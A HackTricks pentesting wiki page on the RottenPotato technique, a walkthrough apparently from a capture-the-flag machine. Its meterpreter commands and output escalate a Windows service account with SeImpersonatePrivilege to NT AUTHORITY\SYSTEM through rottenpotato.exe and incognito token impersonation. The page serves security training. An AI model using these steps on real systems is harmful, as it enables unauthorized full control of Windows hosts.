HackTricks
Search…
Pentesting
Powered By GitBook
RottenPotato
The info in this page info was extracted from this post
Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges.
I won’t go into the details on how this exploit works, the article above explains it far better than I ever could.
Let’s check our privileges with meterpreter:
1
meterpreter > getprivs
2
3
Enabled Process Privileges
4
==========================
5
6
Name
7
----
8
SeAssignPrimaryTokenPrivilege
9
SeChangeNotifyPrivilege
10
SeCreateGlobalPrivilege
11
SeImpersonatePrivilege
12
SeIncreaseQuotaPrivilege
13
SeIncreaseWorkingSetPrivilege
Copied!
Excellent, it looks like we have the privileges we need to perform the attack. Let’s upload rottenpotato.exe
Back on our meterpreter session we load the incognito extension.
1
meterpreter > use incognito
2
Loading extension incognito...Success.
3
meterpreter > list_tokens -u
4
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
5
Call rev2self if primary process token is SYSTEM
6
7
Delegation Tokens Available
8
========================================
9
NT SERVICE\SQLSERVERAGENT
10
NT SERVICE\SQLTELEMETRY
11
TALLY\Sarah
12
13
Impersonation Tokens Available
14
========================================
15
No tokens available
Copied!
We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit.
1
meterpreter > execute -f rottenpotato.exe -Hc
2
Process 3104 created.
3
Channel 2 created.
4
meterpreter > list_tokens -u
5
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
6
Call rev2self if primary process token is SYSTEM
7
8
Delegation Tokens Available
9
========================================
10
NT SERVICE\SQLSERVERAGENT
11
NT SERVICE\SQLTELEMETRY
12
TALLY\Sarah
13
14
Impersonation Tokens Available
15
========================================
16
NT AUTHORITY\SYSTEM
Copied!
We need to quickly impersonate the token or it will disappear.
1
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
2
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
3
Call rev2self if primary process token is SYSTEM
4
[-] No delegation token available
5
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
6
meterpreter > getuid
7
Server username: NT AUTHORITY\SYSTEM
Copied!
Success! We have our SYSTEM shell and can grab the root.txt file!
Last modified 2yr ago
Copy link